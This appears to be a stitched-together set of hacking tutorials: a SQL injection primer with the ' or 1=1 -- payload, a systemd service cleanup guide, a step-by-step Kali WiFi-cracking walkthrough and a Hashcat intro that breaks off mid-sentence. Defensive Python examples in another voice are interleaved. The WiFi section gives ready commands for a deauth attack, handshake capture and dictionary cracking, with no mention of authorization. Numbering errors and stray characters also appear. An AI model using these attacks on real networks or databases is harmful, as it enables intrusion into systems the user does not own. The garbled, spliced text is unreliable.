🦑 SQL INJECTION FOR BEGINNERS FULL TUTORIAL
1) SQL injection is one of the more common network attack methods. Instead of exploiting a bug in the operating system, it targets the programmer's negligence when writing code and uses SQL statements to log in without an account, or even to tamper with the database.
2) When an application uses input to construct a dynamic SQL statement to access the database, a SQL injection attack can occur. If the code uses stored procedures, and these stored procedures are passed strings containing unfiltered user input, SQL injection can also occur.
3) SQL injection may allow an attacker to use the application to log in and execute commands in the database. If the application uses an overprivileged account to connect to the database, the problem becomes very serious. In some forms, the content entered by the user is used directly to construct dynamic SQL commands or as input parameters of stored procedures; these forms are particularly vulnerable to SQL injection. Many website programs, when written, neither check the validity of user input nor handle variables properly in the program itself, which creates a potential security risk for the application.
4) In this way, a user can submit a piece of database query code and, based on the results returned by the program, obtain sensitive information or even control the entire server; this is SQL injection.
🦑 The general idea of SQL injection attacks:
1) Find the location of the SQL injection
2) Determine the server type and backend database type
3) Carry out the SQL injection attack according to the characteristics of that server and database
🦑 A simple example:
SQL> create table account(id number primary key, name varchar2(10), password varchar2(20));
Table created.
SQL> insert into account values(1, 'bisal', '111111');
1 row created.
SQL> commit;
Commit complete.
SQL> select * from account;
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111
SQL> select * from account where name='' or 1=1 -- and password='';
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111
With the condition "username = 'xx' or 1 = 1", the user name becomes "empty or 1 = 1"; because 1 = 1 is always true, the condition succeeds. In addition, the two dashes "--" appended after it start a comment, so the rest of the statement (the password check) is ignored and the query always executes successfully; the user can easily cheat the system and obtain a valid identity.
The reason for the SQL injection vulnerability is splicing SQL parameters: the query parameters taken from input are concatenated directly into the SQL statement, which produces the vulnerability. For example,
select id, password from user where id = 2;
If the statement is obtained by stitching SQL strings, for example,
String sql = "select password from user where id =" + id;
Here id is a parameter entered by the user. If the user enters "2 or 1 = 1" to perform the SQL injection attack, the statement becomes select id, password from user where id = 2 or 1 = 1; and all the records in the user table are returned, which is a typical SQL injection.
Imagine the user supplying some dangerous operation, such as drop table: then the attack through SQL injection is not just a data leak but may damage the database.
🦑 As for the solution, someone summed it up:
1) Never trust user input. Validate the user's input: you can use regular expressions, limit the length, escape single quotes and double dashes ("--"), etc.
2) Never use dynamically assembled SQL. Use parameterized SQL (bound variables) or stored procedures directly for data access.
3) Never use a database connection with administrator rights; use a separate database connection with limited rights for each application.
4) Do not store confidential information in plain text; encrypt or hash passwords and sensitive information.
5) The application's exception messages should give as few hints as possible. It is best to wrap the original error message in a custom error message.
6) SQL injection is generally detected with auxiliary tools or a website scanning platform.
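The following is an added example, not code from the tutorial or from undercode. It rebuilds the page's account table (bisal / 111111) in an in-memory SQLite database and shows the spliced login query beside a version that applies mitigations 2 and 4 from the list above: the user name is passed as a bound variable, and the password is stored and compared as a salted PBKDF2 hash rather than in plain text. The payload used is the one already shown on the page (' or 1=1 --); the table layout, the iteration count and the salt$digest storage format are assumptions made for this example.

```python
import hashlib
import hmac
import os
import sqlite3

# Work factor for PBKDF2-HMAC-SHA256; a constructed value for this example.
PBKDF2_ITERATIONS = 100_000


def hash_password(password, salt=None):
    """Return 'salt_hex$digest_hex' for a password (mitigation 4: never store it in the clear)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ITERATIONS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def make_db(hashed):
    """Constructed in-memory copy of the page's account table (id, name, password).
    With hashed=True the password column holds a PBKDF2 hash instead of '111111'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    secret = hash_password("111111") if hashed else "111111"
    conn.execute("INSERT INTO account VALUES (1, 'bisal', ?)", (secret,))
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """The page's pattern: user input spliced straight into the SQL text."""
    sql = f"SELECT id, name FROM account WHERE name='{name}' AND password='{password}'"
    # With name = "' or 1=1 --" the WHERE clause becomes  name='' or 1=1  and the
    # password check is commented out, so every row comes back.
    return conn.execute(sql).fetchall()


def login_hardened(conn, name, password):
    """Mitigations 2 and 4: bound variable for the lookup, hash comparison in code."""
    row = conn.execute(
        "SELECT id, name, password FROM account WHERE name = ?", (name,)
    ).fetchone()
    if row is None or not verify_password(password, row[2]):
        return None  # one generic failure for unknown user and wrong password
    return (row[0], row[1])


if __name__ == "__main__":
    payload = "' or 1=1 --"
    print("vulnerable:", login_vulnerable(make_db(False), payload, ""))
    print("hardened:  ", login_hardened(make_db(True), payload, ""))
    print("hardened, real credentials:", login_hardened(make_db(True), "bisal", "111111"))
```

Run the block directly to see the spliced query return the bisal row for the payload while the bound-variable version returns None; the only input that logs in on the hardened path is the real user name with the real password. The same `?` placeholder style works for the id lookup shown earlier on the page.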
🦑 Learning more about SQL injection for free:
1) Sqli-labs
Sqli-labs is a game-style tutorial written by an Indian programmer for learning SQL injection. It can be installed locally and accessed through a browser to practise various SQL injection cases.
https://github.com/Audi-1/sqli-labs
2) OWASP
OWASP (Open Web Application Security Project) is an open-source organization for information security. It hosts various open-source projects that you can participate in or use under their terms. If you are interested, have a look.
http://www.owasp.org.cn/owasp-project
🦑 Linux system boot items cleanup full by undercode
t.me/undercodeTesting
🦑 LET'S START:
1) In general, general-purpose Linux distributions start various service processes at boot time, including many services that you may never use, such as Bluetooth (bluetooth), Avahi, the modem manager (ModemManager), pppd-dns (written ppp-dns in the original) and others. What are these things, where are they used and what do they do?
2) Systemd provides many good tools for viewing system startup and can also control what runs when the system starts. In this article, I will explain how to shut down some annoying processes on a systemd-based distribution.
🦑 View boot items
In the past, you could easily see which service processes would be started at boot by looking in /etc/init.d. Systemd presents this differently. You can use the following command to list the services that are enabled to start:
1) $ systemctl list-unit-files --type=service | grep enabled
accounts-daemon.service enabled
anacron-resume.service enabled
anacron.service enabled
bluetooth.service enabled
brltty.service enabled
[...]
2) At the top of this list, for me, the Bluetooth service is redundant, because I don't need to use Bluetooth on this computer, so I don't need to run this service. The following commands stop the service and prevent it from starting at boot.
3) $ sudo systemctl stop bluetooth.service
4) $ sudo systemctl disable bluetooth.service
🦑 You can use the following command to check whether the operation was successful.
1) $ systemctl status bluetooth.service
bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: enabled)
Active: inactive (dead)
Docs: man:bluetoothd(8)
2) A disabled service can still be started by another service that depends on it. If you really want the process never to start at boot under any circumstances, you don't need to uninstall it; just mask it, which stops it from starting under any circumstances.
3) $ sudo systemctl mask bluetooth.service
Created symlink from /etc/systemd/system/bluetooth.service to /dev/null.
4) Once you are satisfied that preventing the service from starting has no negative effects, you can also choose to uninstall the package.
🦑 The full service list can be obtained by executing the command:
1) $ systemctl list-unit-files --type=service
UNIT FILE STATE
accounts-daemon.service enabled
acpid.service disabled
alsa-restore.service static
alsa-utils.service masked
2) You cannot enable or disable static services: a static unit is pulled in as a dependency of other units, which does not mean it runs on its own.
🦑 What services can be prohibited?
1) How do you know which services you need and which ones can be safely disabled? It always depends on your individual needs.
2) Here, as examples, are the roles of several service processes. Many service processes are distribution-specific, so you should check your distribution's documentation (for example via Google or StackOverflow).
3) accounts-daemon.service is a potential security risk. It is part of AccountsService, which allows programs to obtain or manipulate user account information. I don't see a good reason to allow such background operations, so I chose to mask the service.
4) avahi-daemon.service is used for zero-configuration network discovery, making it easy for computers to discover printers or other hosts on the network. I always disable it and don't miss it.
> brltty.service provides support for Braille devices, such as Braille displays.
> debug-shell.service opens a huge security hole: the service provides a passwordless root shell to help debug systemd problems. Never start this service unless you are actually using it.
> ModemManager.service is a daemon activated by dbus to provide a mobile broadband (2G/3G/4G) interface. If you don't have such an interface, whether built in, a phone paired via Bluetooth, or a USB adapter, then you do not need the service.
> pppd-dns.service is a relic of computing history; if you use dial-up to access the Internet, keep it, otherwise you do not need it.
> rtkit-daemon.service sounds terrible, like a rootkit, but you need this service because it is a real-time kernel scheduler.
> whoopsie.service is the Ubuntu error reporting service. It collects Ubuntu system crash reports and sends them.
> wpa_supplicant.service is only required when you use a Wi-Fi connection.
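As an added example (not part of undercode's post), the script below turns the review above into a small audit: it parses the output format of `systemctl list-unit-files --type=service` shown earlier, reports which of the units discussed on this page are currently enabled, puts debug-shell.service first, and prints the stop / disable / mask sequence the page uses for each one. The sample output is constructed from the unit names on the page, not captured from a real machine, and the notes table is my summary of the page's own descriptions.

```python
import re

# Constructed sample of `systemctl list-unit-files --type=service` output, built from
# the unit names that appear on the page; not captured from a real system.
SAMPLE_OUTPUT = """\
UNIT FILE                  STATE
accounts-daemon.service    enabled
acpid.service              disabled
alsa-restore.service       static
alsa-utils.service         masked
avahi-daemon.service       enabled
bluetooth.service          disabled
brltty.service             enabled
debug-shell.service        enabled
ModemManager.service       enabled
pppd-dns.service           enabled
rtkit-daemon.service       enabled
whoopsie.service           enabled
wpa_supplicant.service     enabled

13 unit files listed.
"""

# Units the page suggests reviewing, with a one-line summary of its reasoning.
REVIEW_NOTES = {
    "accounts-daemon.service": "AccountsService: lets programs read/manipulate user account info",
    "avahi-daemon.service": "zero-configuration network discovery (printers, other hosts)",
    "brltty.service": "Braille device support",
    "debug-shell.service": "passwordless root shell for debugging systemd; never leave enabled",
    "ModemManager.service": "mobile broadband (2G/3G/4G) interface",
    "pppd-dns.service": "dial-up relic",
    "whoopsie.service": "Ubuntu crash reporting",
    "wpa_supplicant.service": "only needed for a Wi-Fi connection",
}
# The two units the page chooses to mask rather than merely disable.
MASK_ALSO = {"debug-shell.service", "accounts-daemon.service"}

# First column: unit name; second column: state. Newer systemctl versions add a
# VENDOR PRESET column, which this pattern simply ignores.
LINE_RE = re.compile(r"^(\S+\.service)\s+(\S+)")


def parse_unit_files(text):
    """Map unit name -> state, skipping the header and the trailing count line."""
    states = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            states[m.group(1)] = m.group(2)
    return states


def review_boot_services(states):
    """Return (unit, state, note) for enabled units on the page's review list,
    with debug-shell.service first because it is the most dangerous."""
    findings = [
        (unit, state, REVIEW_NOTES[unit])
        for unit, state in states.items()
        if state == "enabled" and unit in REVIEW_NOTES
    ]
    findings.sort(key=lambda f: (f[0] != "debug-shell.service", f[0].lower()))
    return findings


def remediation_commands(unit):
    """The page's stop -> disable -> (optionally) mask sequence for one unit."""
    cmds = [f"sudo systemctl stop {unit}", f"sudo systemctl disable {unit}"]
    if unit in MASK_ALSO:
        cmds.append(f"sudo systemctl mask {unit}")
    return cmds


if __name__ == "__main__":
    states = parse_unit_files(SAMPLE_OUTPUT)
    static = sorted(u for u, s in states.items() if s == "static")
    print("static units (cannot be enabled/disabled):", ", ".join(static))
    for unit, state, note in review_boot_services(states):
        print(f"{unit}: {state} -- {note}")
        for cmd in remediation_commands(unit):
            print("   ", cmd)
```

On a real machine, replace SAMPLE_OUTPUT with the captured text of `systemctl list-unit-files --type=service` and review the printed commands before running any of them; whether a unit is safe to disable still depends on the machine, as the page says.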
written by undercode
🦑 Kali Linux crack WiFi tutorial full by undercode:
> Cracking WiFi is a relatively simple operation in Kali. The most important thing for cracking WiFi is to have a good dictionary. I take the rockyou dictionary that comes with Kali Linux as an example, located at /usr/share/wordlists/rockyou.txt.gz.
🦑 Unzip before use:
# gzip -d /usr/share/wordlists/rockyou.txt.gz
Without further ado, the tutorial begins.
1) Check whether the network card supports monitor mode.
Enter in the terminal: airmon-ng
The wireless network cards that support monitor mode are listed in the output. You can see that wlan0 supports monitor mode.
2) Turn on the monitor mode.
Enter in the terminal: airmon-ng start wlan0
After successful execution, the NIC interface becomes wlan0mon; you can use the ifconfig command to view it.
4) Check the WiFi network.
Enter in the terminal: airodump-ng wlan0mon
At this point the surrounding WiFi networks and their details will be listed, including signal strength, encryption type, channel, etc. Note the channel number and BSSID of the WiFi to be cracked. Press Ctrl-C to end.
5) Grab the handshake packet.
Start packet capture: airodump-ng -c 6 --bssid BC:46:99:66:F9:84 -w ~/ wlan0mon
Parameter explanation:
-c specifies the channel number
--bssid specifies the router BSSID
-w specifies where to save the captured packets
Note the spaces here.
6) Force the device connected to wifi to reconnect to the router
After step 4, we need to wait for a user to connect or reconnect to the WiFi in order to capture the handshake. This may take a long time, because a new user has to connect to the WiFi, so we force a user to reconnect. Kali ships a tool called aireplay-ng that can force users off the WiFi; the principle is to send a deauth (deauthentication) packet to a device connected to the WiFi so that the device disconnects, after which it naturally connects to the WiFi again.
6) However, aireplay-ng is only effective if at least one device is connected to the WiFi network. From the earlier output (picture 3) you can see which devices are connected to the WiFi; STATION is the MAC address of a connected device, so note one down.
Open a new terminal and execute: aireplay-ng -0 2 -a 46:99:66:F9:84 -c B8:E8:56:09:CC:9C wlan0mon
Parameter explanation:
-0 means to launch a deauthentication attack
-a specifies the wireless router BSSID
-c specifies a device to be forcibly disconnected
Note the code spaces here.
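From the defender's side, the deauthentication step described above leaves a clear trace: a burst of deauth management frames for one BSSID in a short time, followed by a station re-associating. The following is an added example, not part of undercode's tutorial, that implements that detection over a constructed list of frame records (timestamp in seconds, frame subtype, BSSID, station). The record layout, the locally administered 02:... MAC addresses and the window/threshold values are assumptions for this example; a wireless IDS would feed it from its own capture.

```python
from collections import defaultdict

# Constructed management-frame records: (timestamp_s, subtype, bssid, station).
# Locally administered 02:... addresses are used so they cannot match real hardware.
SAMPLE_FRAMES = [
    (0.0, "beacon", "02:00:00:00:00:0a", "ff:ff:ff:ff:ff:ff"),
    (1.0, "deauth", "02:00:00:00:00:0b", "02:00:00:00:00:21"),  # isolated: benign
    (5.0, "beacon", "02:00:00:00:00:0a", "ff:ff:ff:ff:ff:ff"),
    # eight deauth frames within two seconds against one station
    *[(10.0 + 0.25 * i, "deauth", "02:00:00:00:00:0a", "02:00:00:00:00:42") for i in range(8)],
    (12.0, "assoc_req", "02:00:00:00:00:0a", "02:00:00:00:00:42"),  # station reconnects
    (61.0, "deauth", "02:00:00:00:00:0b", "02:00:00:00:00:21"),  # still isolated
]


def detect_deauth_bursts(frames, window_s=5.0, threshold=5):
    """Return one finding per BSSID whose deauth frames reach `threshold` inside any
    `window_s`-second window: (bssid, peak_count, window_start, window_end).

    A sliding window over the sorted timestamps keeps this O(n) per BSSID, so it is
    cheap enough to run continuously on a monitor-mode feed."""
    by_bssid = defaultdict(list)
    for ts, subtype, bssid, _station in frames:
        if subtype == "deauth":
            by_bssid[bssid].append(ts)

    findings = []
    for bssid, times in by_bssid.items():
        times.sort()
        best_count, best_start, best_end = 0, None, None
        left = 0
        for right, t in enumerate(times):
            while t - times[left] > window_s:  # drop frames that fell out of the window
                left += 1
            count = right - left + 1
            if count > best_count:
                best_count, best_start, best_end = count, times[left], t
        if best_count >= threshold:
            findings.append((bssid, best_count, best_start, best_end))
    return findings


if __name__ == "__main__":
    for bssid, count, start, end in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {count} frames for {bssid} between t={start}s and t={end}s")
```

Legitimate deauth frames do occur (an access point dropping an idle client, a device roaming), which is why the rule triggers on a burst rather than a single frame; the isolated frames for the second BSSID in the sample are below the threshold and produce nothing. The network-side mitigation is 802.11w protected management frames, which authenticate deauthentication frames so that spoofed ones are discarded by the client.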
π¦Press Ctrl-C to end the packet capture.
We have obtained the desired handshake packet, and we can end the monitoring mode of the wireless network card:
7) Start cracking the password.
Enter in the terminal: aircrack-ng -a 2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
Parameter explanation:
-a 2 selects the WPA handshake attack mode
-b specifies the BSSID of the WiFi to be cracked
-w specifies the dictionary file
The last argument is the captured packet file.
8) Then just wait; it may take a few minutes or a few hours, depending on the computer's performance and the complexity of the password. If it is unsuccessful, you can try other dictionaries (for example ones found via Baidu).
🦑 Use Hashcat to brute force crack the password hash
1) In recent years, the development of graphics cards has changed dramatically; they now contain hundreds or thousands of processors inside the chip, all of which work in parallel.
2) Applied to password cracking, this means that if a single processor can calculate 10,000 hashes in one second, a GPU with 1,000 cores can reach 10 million, reducing the cracking time by a factor of 1,000 or more. In this chapter, we will use Hashcat to brute force a hash.
3) But this only works if you install Kali Linux as the base system on a computer with an Nvidia or ATI chipset. If you install Kali Linux in a virtual machine, GPU cracking may not work, but you can install Hashcat on the host. There are Windows and Linux versions (https://hashcat.net/hashcat/).
🦑 Environment preparation
You need to ensure that the graphics drivers are installed correctly and that Hashcat is compatible with them, so do the following:
1) Run Hashcat on its own; it will tell you if there is a problem: hashcat
2) Test the hash rate of each algorithm it supports in benchmark mode: hashcat --benchmark
3) Depending on your installation, you may need to force Hashcat to use your specific graphics card: hashcat --benchmark --force
🦑 Combat drill
Let's crack a hash value. Take the administrator's hash